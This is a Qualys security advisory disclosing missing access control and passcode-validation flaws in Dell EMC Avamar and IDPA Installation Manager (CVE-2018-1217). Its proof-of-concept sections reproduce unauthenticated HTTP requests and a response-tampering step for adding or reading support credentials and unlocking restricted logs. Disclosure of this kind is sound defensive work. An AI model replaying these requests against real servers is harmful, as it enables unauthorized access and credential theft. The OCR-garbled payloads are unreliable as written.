Qualys Security Advisory QSA-2017-11-24 


November 24, 2017 


Dell EMC Avamar and Integrated Data Protection Appliance (IDPA) Installation Manager Missing 
Access Control Vulnerability 


SYNOPSIS: 


Dell EMC Avamar and Integrated Data Protection Appliance suffer from multiple vulnerabilities and some of 
which can be exploited by an unauthenticated user. 


Reference:- https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data- 
Protection-Software/p/DELL EMC-Avamar-Virtual-Edition 


CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1217 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target: Dell EMC Avamar Virtual Edition 
2. Target IP Address: 10.113.198.230 


Vulnerable/Tested Version: 


Dell EMC Avamar Server 7.3.1 
Dell EMC Avamar Server 7.4.1 
Dell EMC Avamar Server 7.5.0 
Dell EMC Integrated Data Protection Appliance 2.0 
Dell EMC Integrated Data Protection Appliance 2.1 


Avamar® Installation Manager 


Host Server: 
10.113.198.230 


Product Info: 
Avamar 7.5.0-183 


Installation Manager Version: 
7.5.0.183 


Downloader Service: 
(Not configured) 


Vulnerability1: Missing functional level access control allows an unauthenticated user to add DELL 
EMC Support Account to the Installation Manager (C VE-2018-1217) 


DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up 
Installation Manager configurations, or check for new packages from the Online Support site. 


Risk Factor: High 


Impact: 


An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user 
interaction. 


CVSS Score: AV: N/AC: L/AU: N/C:P/I: N/A:N 


Proof-Of-Concept: 


1. Check or confirm existing settings for this section: 


Avamar® Installation Manager 


SW Releases History Repository Configuration 


Configuration 


This page lets you set up Installation Manager configurations, or check for new packages from the Online Support site. 


Username: EMC-Supportxxx 


Password: coocoo 
Proxy Server Settings 
Enable E 
proxy: 


Enter the hostname and port number of the proxy server. 


Proxy Host: 
Proxy Port: 


Use 
Authentication: 


Username: 


Password: 


Check For New Packages | 


Replay following request in BurpSuite with session Cookies removed: 


Go Cancel Í <div] | >I¥ Target: https://10.113.198.230 |4] (4 


Request Response 

[Raw | Params | Headers | Hex | | Raw | Headers | Hex 

POST /avi/avigui/avigwt HTTP/1.1 ry HTTP/1.1 200 OK 

Host: 10.113.198.230 Date: Fri, 24 Nov 2017 05:50:43 GMT 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Server: Jetty(9.0.€.v20130930) 
Firefox/52.0 X-Frame-Options: SAMEORIGIN 

Accept: */* Content-Type: application/json; charset=utf-8 
Accept-Language: en-US,en;q=0.5 Content-Disposition: attachment 
Accept-Encoding: gzip, deflate Content-Length: 16 

Content-Type: text/x-gwt-rpe; charset=utf-8 Connection: close 
X-GWT-Module-Base: https://10.113.198.230/avi/avigui/ //OK[1,[""],0,7] 


Referer: https://10.113.198.230/avi/avigui.html 

Content-Length: 454 

Connection: close 
7I|0|7[https://10.113.1S8.230/avi/avigui/|6O0AF6BC6976FSB1FO5AC454813F5324D|com.av 
amar.avinstaller.gwt.shared. AvinstallerService|saveLDLSConfig| java. lang.String/ 
2004016611] 10.113.198.230|{"proxyHost":null, "proxyPort":0, 
"useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, 
"disableInternetAccess":false, "proxyEnable":false, 


"disableLDLS": false} |1|2/3/4/3/5/5|5)6|0/71 


Note: The request is processed successfully even after the “X-GWT-Permutation:’ header is manipulated. 


Confirm that the user ‘hacker’ is added successfully: 


Avamar® Installation Manager 


SW Releases History Repository Configuratior 


Configuration 
This page lets you set up Installation Manager configurations, or check for new packages from the Online Support site. 


Username: hacker 


Password: eee. 


Proxy Server Settings 


Enable LJ 

proxy: 

Enter the hostname and port number of the proxy server. 
Proxy Host: 

Proxy Port: 


Use 
Authentication: 


Username: 


Password: 


Save | Check For New Packages | 


Vulnerability2: Missing functional level access control allows an unauthenticated user to retrieve 
DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217) 


DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up 
Installation Manager configurations, or check for new packages from the Online Support site. 
Risk Factor: High 


Impact: 


An unauthenticated, remote attacker could retrieve Online Support Account password in plain text. 


CVSS Score: AV: N/AC: L/AU: N/C:P/I: N/A:N 


Proof-Of-Concept: 


1. Check or confirm existing settings for this section: 


Avamar® Installation Manager 


SW Releases History Repository ‘Configuration 


Configuration 


This page lets you set up Installation Manager configurations, or check for new packages from the Online Support site. 


Username: EMC-Supportxxx 


Password: eee... 
Proxy Server Settings 
Enable LJ 
proxy: 


Enter the hostname and port number of the proxy server. 


Proxy Host: 
Proxy Port: 


Use 
Authentication: 


Username: 


Password: 


Check For New Packages 


2. Replay following request in BurpSuite with session Cookies removed: 


Go Cancel < v > v Target: https://10.11.42.110 | # |? 
Request 
EO (l 
POST /avi/avigui/avigwt HTTP/1.1 ja HTTP/1.1 ja 
Host: 10.11.42.110 Date: Tue, 23 Jan 2018 06:08:36 GMT 
Connection: Keep-Alive Server: Jetty(9.0.6.v20130930) 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:59.0) X-Frame-Options: SAMEORIGIN 
Gecko/20100101 Firefox/59.0 Content-Type: application/json; charset=utf-8 
Accept: */* Content-Disposition: attachment 
Content-Type: text/x-gwt-rpc; charset=utf-8 Content-Length: 283 
X-GWT-Permutation: D0386544BCA6922FF33178722F891345 Keep-Alive: timeout=15, max=100 
Accept-Encoding: gzip, deflate Connection: Keep-Alive 
Accept-Language :en-US, en; q=0.9 
DNT: 1 //OK[1, ("{\"proxyHost\":null,\"proxyPort\":0, \"useProxyAuthentication\": false, \"proxyUsername 
Content-Length: 192 w2\"\",\"proxyPassword\":\"\",\ "disableInternetAccess\":false, \"proxyEnable\":false,\"emcsuppo 


mm ",\"disableLDLS\":false}"],0,7 
7/0|6|10.11.42.110/avi/avigui/ | €60AF€BCE697EFSB1FO5AC454813F5324D| 
-avamar.avinstaller.gwt.shared.AvinstallerService 


java. lang. String/2004016611/10.11.42.110) 1/213) 412 


Note: The request is processed successfully even after the “X-GWT-Permutation:’ header is manipulated. 


As you can see from above screenshot, the user password was retrieved in plain text. 


Vulnerability3: Improper validation of ‘DELL EMC Customer Support passcode’ allows an 
authenticated user to unlock DELL EMC Support Account and download verbose logs 


DELL EMC Avamar fails to validate ‘DELL EMC Customer Support passcode’ properly allowing an 
authenticated user to unlock the support account and view/download verbose logs. 


Risk Factor: Medium 


Impact: 


An authenticated user could exploit this vulnerability to unlock DELL EMC support account and access verbose 
logs that were restricted on purpose. 


CVSS Score: AV: N/AC: L/AU: S/C:N/I: N/A:N 


Proof-Of-Concept: 


1. Try to unlock the support account with an invalid password and you get an error: 


Avamar® Installation Manager 


S Release History Repository Configuration 
> Step 1:Package Selection p Step 2:Installation Setup pb Step 3:Installation Progress 


SW Releases 


Select a package, and then click the appropriate button to proceed. 
Note: For Support-Only packages, the action buttons will be disabled for Non-Support users. 


Package List Grouping: Relea: 


Passcode 


= Type the Customer Support passcode: 


| OK || Cancel 


Warning 


A Customer Support access denied. 


= 


` — — — 


Now send the same request again, Note the invalid password highlighted: 


(A) Request to https://10.113.198.230:443 
{Forward || Dop | [Intereeptison | | Action J 
[Raw | Params | Headers | Hex 


POST /avi/avigui/avigwt HTTP/1.1 
Host: 10.113.198.230 


User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: */* 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Content-Type: text/x-gwt-rpce; charset=utf-8 
X-GWUT-Permutation: CO38é544BCAES22FF33178722F95C424 
X-GWT-Module-Base: https://10.113.198.230/avi/avigui/ 
Referer: https://10.113.198.230/avi/avigui.html 
Content-Length: 216 

Cookie: JSESSIONID=lprceku3ef7d2 LStrkctham0dy 
Connection: close 


7(O|7| https://10.113.198 
1] 10.113.198.230)adsai 


30/avi/avigui/ | 60AFEéBCES7EFSB1LFO548C454813F5324D| com. avamar.avinstaller.gwt.shared. AvinstallerService|supportLogin| java. lang.String/200401661 
S| 1|2131413151515161017|[ 


Intercept the server response: 


B, Response from https://10.113.198.230:443/avi/aviqui/avigwt 
Forward Drop Intercept is on Action 


HTTP/1.1 200 OK 

Date: Fri, 24 Nov 2017 04:29:22 GMT 

Server: Jetty(9.0.6.v20130930) 
X-Frame-Options: SAMEORIGIN 

Content-Type: application/json; charset=utf-8 
Content-Disposition: attachment 
Content-Length: 21 

Connection: close 


//OK[1,["false"],D,7] 


Change the response to ‘True’ from ‘False’: 


Q Response from https://10.113.198.230:443/avi/avigui/avigwt 


HTTP/1.1 200 OK 

Date: Fri, 24 Nov 2017 04:29:22 GMT 

Server: Jetty(9.0.6.v20130930) 
X-Frame-Options: SAMEORIGIN 

Content-Type: application/json; charset=utf-8 
Content-Disposition: attachment 
Content-Length: 21 

Connection: close 


//OK[1, ("true") ,0, 7] 


5. It unlocks the support account: 


6. View the logs: 


<€ OH https://10.113.198.230:7543/avi/logapp.html ë # Q. Search x 8 + ff 4 -9 
INT ` œ @ SQL- XSS- Encryption: Encoding» Other- 

a Load URL 

Q SpltURL 

>) Execute 


Enable Post data [[] Enable Referrer 


avinstaller.log.0 


m 


H hide ine # ar pasting 


Copying getnodelogs script to nodes 

node [] not responsive, removing from list - no network interfaces are tagged for internal use or are otherwise unrestricted on node at index O among nodes selected by "all" 

ERROR: there were no responsive nodes, stopped at /usr/local/avamar/bin/mapall line 124. 

Igetlogs: ERROR: command "[ -r /etc/profile ] && . /etc/profile >/dev/null 2>&1 ; cd /usr/local/avamar/bin/; mapall --nodes=all --parallel --user=root --quiet copy getnodelogs” exited with error 
= 255 - quitting 


i ERROR: command "[ -r /etc/profile ] && . /etc/profile >/dev/null] 2>&1 ; ssh-agent bash -c "[ -r /etc/profile ] && . /etc/profile >/dev/null 2>&1 ; ssh-add /root/.ssh/rootid && /usr/loc 
/avamar /bin/getlogs --_rerun_ssh_agent”" exited with error status = 1 - quitting 


Nov 24, 2017 4:18:51 AM com.avamar.avinstaller.report. NodeLogsServlet executeGetLogs 

WARNING: Node log file not found after running getlogs. 

Nov 24, 2017 4:18:51 AM com. avamar.avinstaller.report,NodeLogsServlet doPost 

WARNING: Node log file not found after running getlogs. 

Nov 24, 2017 4:18:51 AM Com. avamar.avinstaller.gwt.server.AvinstallerserviceImp] callservice 

WARNING: ----- exception in callService: http: //localhost:7580/avi/nodeLogs msg: http: //localhost:7580/avi /nodeLogs 
Nov 24, 2017 4:18:51 AM com.avamar.avinstaller.gwt.server.AvinstallerServiceImp] handleServiceException 

INFO: FileNotFoundexception (most likely the diff in versions of API) 

Nov 24, 2017 4:25:16 AM Com. avamar.avinstaller.gwt.server.GwTCachecontrolFilter doFilter 

INFO: ---- requestuRI: /avi/avigui/avigui.nocache. js 

Nov 24, 2017 4:25:17 AM com.avamar.avinstaller.gwt.server.AvinstallerServiceImp] getSysInfo 

INFO: [aviguiserv:getSysInfo] http: //localhost: 7580/avi/service/info/sysinfo/product calling with param: product 
Nov 24, 2017 4:25:17 AM Com. avamar.avinstaller.gwt.server.AvinstallerServiceImp] callService 

INFO: Caviguiserv:10,113.198.230] making rest call: http: //localhost: 7580/avi/service/info/sysinfo/product 

Nov 24, 2017 4:25:17 AM com. avamar.avinstaller.security.GPGSign callGPGCommand 

INFO: Command: gpg --verify /opt/emc-tools/bin/sys-info.sig /opt/emc-tools/bin/sys-info returned: gpg: Signature made Mon 12 Jun 2017 11:40:15 PM UTC using RSA key ID 54892805 
gpg: Good signature from “avpkey (Avamar Package Key)" 

gpg: WARNING: This key is not certified with a trusted signature! 

gpg: There is no indication that the signature belongs to the owner. 

Primary key fingerprint: E066 D6AB 7A03 A9FS 014E 529A A712 7C33 5489 2BD5 


Nov 24, 2017 4:25:17 AM Com. avamar.avinstaller.security.GPGSign callGPGCommand 


7. View verbose logs: 


€ OM https://10.113.198.230:7543/avi/ser @ Q Search 
INT ~ = ® SQL- XSS- Encryption Encodingy Other- 
ws) Load URL 
Q Split URL 
, Execute 
[C] Enable Post data [ ] Enable Referrer 
{"status": "", "fileName": "avinstaller.log.0","fileSize": "1687603","lineCountc": "”19115"“”,"lineScartc": "1","lineEnd": "19115"} 


Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment <clinit> 

INFO: Hibernate 3.3.1.GA 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment <clinit> 

INFO: hibernate.properties not found 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment buildBytecodeProvider 

INFO: Bytecode provider name : javassist 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment <clinit> 

INFO: using JDK 1.4 java.sql.Timestamp handling 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Configuration configure 

INFO: configuring from resource: jbpm.hibernate.cfgq.xml 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Configuration getConfigurationinputStream 

INFO: Configuration resource: jbpm.hibernate.cfg.xml 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Configuration addResource 

INFO: Reading mappings from resource : jbpm.repository.hbm.xml 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.repository.DeploymentImpl -> JBPM4 DEPLOYMENT 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.repository.DeploymentProperty -> JBPM4 DEPLOYPROP 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.id.PropertyImpl -> JBPM4 PROPERTY 

Jun 13, 2017 1:21:12 AM org.hibernate.cfg.Configuration addResource 

INFO: Reading mappings from resource : jbpm.execution.hbm.xml 

Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.model.ExecutionImpl -> JBPM4 EXECUTION 

Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.type.Variable -> JBPM4 VARIABLE 

Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindSubclass 

INFO: Mapping subclass: org.jbpm.pvm.internal.type.variable.BlobVariable -> JBPM4 VARIABLE 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindSubclass 

INFO: Mapping subclass: org.jbpm.pvm.internal.type.variable.DateVariable -> JBPM4 VARIABLE 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindSubclass 

INFO: Mapping subclass: org.jbpm.pvm.internal.type.variable.DoubleVariable -> JBPM4 VARIABLE 


fa An Roa One w Co ees a rondo. wee a 
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CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
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LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


